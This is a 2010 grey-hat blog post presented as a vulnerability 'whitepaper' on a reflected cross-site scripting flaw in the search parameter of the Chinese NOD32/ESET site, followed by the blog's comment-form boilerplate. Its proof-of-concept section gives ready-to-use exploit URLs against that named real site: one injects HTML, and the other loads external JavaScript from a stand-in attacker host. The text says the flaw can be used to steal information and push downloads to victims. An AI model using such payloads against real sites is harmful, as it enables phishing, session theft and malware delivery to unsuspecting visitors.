[whitepaper] NOD32 (CN) Cross Site Scripting Vulnerability

.___________  ________  http://www.nod32.com.cn
____   ____   __| _/\_____  \ \_____  \    ____   ____
/    \ /  _ \ / __ |   _(__  <  /  ____/   _/ ___\ /    \
|   |  (  <_> ) /_/ |  /       \/       \   \  \___|   |  \
|___|  /\____/\____ | /______  /\_______ \ / \___  >___|  /
\/            \/        \/         \/ \/   \/     \/
> Cross Site Scripting Exploit
> Author: Sora
> Contact: vhr95zw [at] hotmail [dot] com
> Website: https://greyhathackers.wordpress.com
> Vulnerability: Cross Site Scripting

————————-
1. INFORMATION          |
————————-
Site: http://www.nod32.com.cn
Vulnerability: Cross Site Scripting
Vulnerability Level: 3

————————-
2. DESCRIPTION          |
————————-

http;//www.nod32.com.cn suffers a remote cross site scripting exploit, which can be used to
scam information and to execute malicious javascript which might remotely download a file to the
victim’s PC.

————————-
3. PROOF OF CONCEPT     |
————————-
Display a message using HTML:
http://www.eset.com.cn/default.php?id=181&p=24&searchword=%3Ch1%3EXSS+-+Sora%3C%2Fh1%3E%3E%22%3Ctitle%3E%3Cmarquee%3EXSS%20by%20Sora%20-%20IMPROVE%20YOUR%20SECURITY%20-%20greyhathackers.wordpress.com&btnG=

Execute malicious code:
http://www.eset.com.cn/default.php?id=181&p=24&searchword=<script src=”http://www.evilsite.com/foo.js”><h2>Error</h2>&btnG=

————————-
4. GREETZ               |
————————-
# Bw0mp # Popc0rn # Revelation # Max Mafiotu # T3eS # Timeb0mb # [H]aruhiSuzumiya # Xermes #

————————-
5. CONTACT              |
————————-
Have any questions? Send me a mail or add me on MSN: vhr95zw [at] hotmail [dot] com

<c> 2010 – https://greyhathackers.wordpress.com – Sora

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: